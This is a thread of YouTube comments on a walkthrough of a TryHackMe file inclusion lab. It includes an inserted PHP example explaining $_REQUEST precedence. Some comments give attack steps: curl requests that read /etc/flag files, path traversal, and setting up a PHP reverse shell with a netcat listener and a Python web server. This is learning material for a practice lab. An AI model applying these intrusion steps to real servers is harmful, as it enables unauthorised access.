I somehow struggled my way through these challenges but didn't really feel like I understood the material. Your explanation was much better than the written material
I agree. It was very poorly written and confusing.
believe me when I tell you, you're not alone!!!
absolutely agree
I really loved to study cybersecurity for the past month but after I got to this point I gave up, convincing myself that I am too stupid for all of this since I couldn't understand a single word they wrote on the site, but after coming across this video and reading the comments I decided I am going to try again, thank you
I wouldn't be able to do this task without this video. good explanation
Thank you for a thorough and concise tutorial. There is no way I could have completed that challenge without your help. Now I just need to do it another five times and I might be able to remember how to do this! Keep up the GREAT work!
This really helped me sir! But I must say that this is a little too advanced for beginners.
It's very fun though!
Try Hack Me has a beginner course called How the Web Works or something like that. If you’re getting a little lost on this video I’d try that course out
@DeeMeltDown even after completing that it's still overwhelming
This room was the first room where I started getting problems. Thanks for this tutorial.
Exactly
I saw that your name is Arabic, so allow me to write in Arabic.
Seriously, a wonderful effort and an easy, simplified explanation.
Also, the last part of the video was amazing. Truly proud that there are Muslims with this skill. I hope to reach your level.
Well done, much better explanations than the provided material. I really think they need to revise or flesh out some of these labs, for example some of the tools that may be helpful such as burp suite aren't covered until later in the path. I ran into a similar issue when they were talking about decoding sha, md5, and base64, they gave you a link to help you with the later but not the base64, later in the path they provided a link. Funny enough it was the one I just happened upon to complete the lab.
The only video you need to understand whole file inclusion concept!!
Thank you so much for this. ❤❤
thanks man! tried the challenges by myself for a while but had no chance. with your help I completed it while still learning a lot.
nice work on this one, really cleared up my mind. Thanks keep it up
love the videos man - so informative and plenty of time to pause and try out yourself out without blurting out the answers
thank you for activating the subtitles, it gives us the possibility to put the translation in French
Thank you for this walkthrough! I could not wrap my head around this room. So much help!
Thanks very much, the written tutorial for this was not particularly helpful but this is much better.
This helped so much even after I'd read the written write up.
Thank you so much for this. This walkthrough is so much better than the room. And I was able to follow along as a mid level cyber learner. 💕
Thanks for the help brother. I didn't just want the answers so I'm happy I came across your channel so I could actually learn step by step. That made much more sense than the verbiage they had.
Thank you! Challenge 3 was whooping my a** and this helped me through. Great explanation good sir!
Thank you for sharing this video, I got a lil stuck on this one but you helped me finally understand what needed to be done/what I was supposed to do
Amazing, this helps so much, you have no idea how great of an instructor you are. Muchas Gracias
Thank you!!! Really appreciate the time you put into this. It was a big help with my limited time to study! I could not repeat the very last bonus challenge. My attack box is not using a TryHackMe account, only root, and I don't have the same files and folders on it. I wonder why the attack boxes are so different. Thanks for doing it though.
I thought it was well done! The best breakdown I've seen out here. I'm glad to have subscribed and will check out the rest of the vids. Keep up the great work!
He sounds like a lawyer or a medic talking to a patient. Becoming surprised when hearing concerning details, but trying to keep you calm.
Loved the content and the way of explanation, thank you brother. I was lacking in this specific topic, I think I am cleared with it now ❤🔥❤🔥❤🔥❤🔥❤🔥
This one is massively unclear in the room. I’ve never had such problems yet as this room.
Very well done sir, I needed a little help with the final 3 questions and your 'answers' were perfect. Using curl to switch the methods was a great idea, I tried it with Burp Suite but it wasn't working for some reason.
Me too, with Burp Suite it wouldn't work... have you figured out why?
@vacumecleaner no I did not. I DID finish the room, but I must have used a different method, looking at my comment I used CURL instead.
Were you able to complete the room at least?
@slybandit8117 Yeah I managed to finish the room, I had to do the CURL method too. I still don't know why Burp Suite didn't work?! lol thanks for replying
Thank you so much for letting us for this tutorial.
And thanks for the php reverse shell XD
It's really helpful for a beginner
Hello Motasem, thank you for taking the time to make this video. I would have never finished without your help. The one thing that really confuses me is using Burp on the THM VM. So I basically followed along from there. Is there a way to complete the challenge without Burp? Thanks again, Ed
In challenge 1, it was specified in the page that we have to use a POST request and yet we used get in this part of curl: -d 'method=get&file=/etc/flag1'. Why is it so? Can someone please explain this to me? Thanks!
I would also like to get an answer.
New Subscriber! Awesome work, my brother! Keep them coming! You are explaining in such an easy way, it's easy to understand! Natural talent! Keep it up! :))))
Great walk through. The question I have, is how does changing the cookie to a file path work. I saw you do it. But I do not understand how or why it works.
26:53 it's already configured to POST, right? (--> curl -X POST)
Totally right. I was just experimenting with it.
Was stuck on Lab 3. Thanks for the help
Thanks for video!
Somehow I am unable to execute RFI tasks - no code executed either from my local web server or from external ones, even the simplest scripts or shells; according to server logs, the vulnerable host is not getting it from my server and is showing a blank "File content preview". Cheated to read /etc/hostname via simple LFI ;(
Did you modify the scripts? For example, on the php-reverse-shell script you need to open it in an editor [nano/subl/vi] and change the IP and port to your local attack machine and the port you want to catch the reverse shell back on. Then open a netcat listener, for example [nc -lvnp 4444], and then execute the command on the victim machine and you should catch that shell
How would anyone who's a beginner be able to figure out these last few tasks without a video like this? They cannot possibly expect people to be able to solve these with such poor instructions. It makes me feel like I'm trying to tackle something that's just not possible.
This is the best walkthrough on FI - thanks for the post! One quick question: I cannot navigate to the tools>php.reverseshell to gain RCE, please assist if you can?
What's your labs techno behind? Kubernetes namespaces and PODs popping on-demand? Or static site?
Wow! Great video, very helpful... Thank you!
Thanks
On Challenge 2, why doesn't my Burp Intercept tab pick up anything whenever I try to reload the page?
Challenge 3 and the last challenge remote execution were very difficult. After spending over 1.5 hours, I decided just to use your answer so I can move on to the next stage.
I always like your video. well explained and clear
you tell me why we could not do it with burp suite and we could do it with curl, and can you explain the commands you wrote in curl, I need to understand please :)
Thank you so much! Has been a great guide and help with these challenges!
Thanks, I was really stuck on a couple of the challenges later. I tried and tried and it didn't work.
Good walkthrough but you should put timestamps in video
Every time I type the curl command verbatim it doesn't give me the flag. What is it that I'm doing wrong?
Thanks! Just a quick question about playground challenge. What is the difference between apache server and python3 that you used? And why is apache using my IP and python using VPN IP?
That’s a good question but best guess is if the Apache web server is using your WAN IP that would be available through the internet while the python web server would only be reachable on the local 10.10.X.X network you’re connected to through the VPN. Once you set up the python web server you can connect to it through the browser by putting in your local IP address
How can one view the contents of flag1 with Burp Suite? I guess many of us can't use Burp Suite. A tutorial will be great. Thanks
Thank you so much Motasem.
Where can I obtain that 'php-reverse-shell.php' file to gain access?
Is it possible to use the method as suggested in the Task? Edit the method as POST in the Web Developer. I know Burp Suite is an option, but this module comes after the RFI tasks are completed in the learning path
I watched this whole video only to find out I forgot to use :8000 on the webserver when targeting my RCE. Good content though!
I'm just curious about this... you have to use Burp Suite without knowing anything? When the Burp Suite room is in the next module? This room is a bit hard for people like us.
In a typical scenario, you don't need Burp Suite. Any HTTP interceptor works
@MotasemHamdan I decided to stop this room for a while and start the other easy modules about the web fundamentals and CompTIA Pentest+, because I need more logic and more understanding about how this works.
@simonbolivar9146 I know it's been a while but you can use inspect element, e.g. for the cookies bit just go into storage and change the cookies there
Why do we change the method to post in the 3rd challenge and why do we not change the method in the first challenge ???
Thank you, this really helped 🙂
Can you demonstrate how to use curl to do the cookie instead of burp?
--cookie
I found an alternative in inspect element. Turns out you can access the cookies through there.
I'm not sure if challenge 3 was updated, but this method does not work for me to retrieve the third flag. I am completely lost.
You can learn something in the Authentication Bypass room. The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favours POST data fields rather than the query string
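The precedence rule described in the comment above, shown as an added example (not code from the video, the room, or any commenter). It emulates the `$_REQUEST` merge so it runs from the PHP CLI, assuming `request_order` is `GP` as in the php.ini files shipped with PHP; `build_request`, `weak_lookup`, `strict_lookup` and the `PAGES` allowlist are hypothetical names.

```php
<?php
declare(strict_types=1);

// Added example: emulates how PHP builds $_REQUEST so it runs from the CLI.
// Sources are merged in request_order; a later source overwrites an earlier
// one that uses the same key ("GP" = GET first, then POST on top).
function build_request(string $order, array $get, array $post, array $cookie): array
{
    $sources = ['G' => $get, 'P' => $post, 'C' => $cookie];
    $merged = [];
    foreach (str_split(strtoupper($order)) as $letter) {
        if (isset($sources[$letter])) {
            $merged = array_replace($merged, $sources[$letter]);
        }
    }
    return $merged;
}

// Hypothetical allowlist: the client sends a page name, never a path.
const PAGES = ['welcome' => 'pages/welcome.txt', 'about' => 'pages/about.txt'];

// Weak pattern: the check reads one source ($get) while the value that is
// actually used comes from the merged array, so the two can disagree.
function weak_lookup(array $get, array $request): ?string
{
    $checked = $get['file'] ?? '';
    if (!is_string($checked) || !array_key_exists($checked, PAGES)) {
        return null;
    }
    $used = $request['file'] ?? '';
    return is_string($used) ? $used : null;   // not the value that was checked
}

// Hardened pattern: read one explicit source and return only the mapped
// path, so the checked value and the used value are the same thing.
function strict_lookup(array $source): ?string
{
    $name = $source['file'] ?? '';
    if (!is_string($name) || !array_key_exists($name, PAGES)) {
        return null;
    }
    return PAGES[$name];
}

// Constructed request: "file" appears in both the query string and the body.
$get  = ['file' => 'welcome'];
$post = ['file' => 'not-on-the-list'];
$request = build_request('GP', $get, $post, []);

var_dump($request['file'] === $post['file']);   // which source won the merge
var_dump(weak_lookup($get, $request));          // value the weak handler would use
var_dump(strict_lookup($post));                 // hardened handler, POST only
var_dump(strict_lookup($get));                  // hardened handler, GET only
```

Reading a parameter from one named superglobal and resolving it through an allowlist removes the dependence on merge order entirely.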
this was good. Thank you!
very coherent, earned my sub
Thanks, it was very clear and useful!
Thank you for a great walkthrough.
Can you give us the repo directory? Any GitHub link or something else??
Thanks, I changed the method and URL by inspecting but it didn't work 😞
How do you get your console to split view like that?
When you used a reverse shell with netcat, why did you use port 4545 instead of 8000?
It's just a personal preference. What's your preferred port?
Very helpful. thank you
Could you please show me how to do it with Burp Suite? Because that's the first thing I did, by changing the request to POST, but I didn't get the page
When right-clicking in the Proxy tab you will see the option "change method".
It will also change a bit of the structure of the request. Hope that helps
I thought I could do it in the developer options or is there no way?
At 20:00, can someone explain to me why he changed the get request to get when it was get already?
Can you set cookies from the developer tools instead of using burp suite?
of course
This is a great video, but every time I watch you go find and then copy and paste instead of typing "%00" I get a little anxious! :P
I will try :)
Just wondering what software or vm are you using?
Kali KDE Plasma
@MotasemHamdan I was wondering if you were using VM fusion?
Oops I mean vsphere?
Wow, love your channel man. How can I get access to your notes? I need notes for web penetration
Hello, Notes are available as part of the channel memberships.
ruclips.net/channel/UCNSdU_1ehXtGclimTVckHmQjoin
thanks for the walkthrough. I think it could have been slightly more in-depth in describing why you did certain things. but wow, the low quality of this tryhackme lesson itself was mind-boggling and painful to go through.
What’s the code for that reverse shell?
Man, why are your recordings at such a low volume? It's so annoying when the commercial comes.
did someone do LAB 5 and if yes what was the bypass
another comment: what icon set are you using in Kali? I want to try it out
KALI KDE Plasma
@MotasemHamdan Thank you! Never tried it
Thank You!
Thank you very much, teacher
thanks so much
ty bro!
TY brother
Thanks!
Thank you too.
I need file shell.php:)
Please next time just turn up the volume of your voice. I cannot hear you clearly even when I turn it to max volume
First view and first like
Hi, I am using the THM AttackBox to attempt the RCE challenge, how do I start a webserver?
sudo python3 -m http.server
This Room was the go for me to switch to HTB. This Room is dogshit sorry ...
All in all, THM is a great platform and I guess you know that there is no platform that is perfect :) I have had my own share of tech problems in HTB too.
@MotasemHamdan good point… I should use this video to step up. Ty Brother 👍🏼
task 8, Capture Flag2 at /etc/flag2 starts from 00:20:41
If I use this reverse shell, my nc shuts down as soon as the link is established. What is the reason?
for the last one, you could also just get the hostname by ../../../../etc/hostname lol
what the hell? this tryhackme module made 0 sense.
They show you basic stuff, then when you need to practice that stuff, they add a lot more that they didn't explain to you. This is why I canceled my sub, and I'm switching to HTB Academy on the first of July.
Was having a bit of trouble with the reverse shell at the end of the video. I'm using kali and ran the command 'locate webshells | grep php' to find where my php webshells were and then I ran the webserver from the directory that php-reverse-shell.php is in. But when I use that as the payload I got an error that said:
WARNING: Failed to daemonise. This is quite common and not fatal.
Warning: fsockopen() [function.fsockopen]: unable to connect to 127.0.0.1:1234 (Connection refused) in 10.13.49.109:8000/php-reverse-shell.php on line 100
I looked at the script at line 100 which says: $sock = fsockopen($ip, $port, $errno, $errstr, 30);
If you scroll to the top of the script there's comments that tell you to edit the variables $ip and $port
I only edited the ip to match my local IP on the 10.10.x.x network - the one you get when you run ifconfig. The port in the script is set to 1234 so I ran: nc -lvp 1234 as the listener.
After I did all this the reverse shell worked for me.
thank you!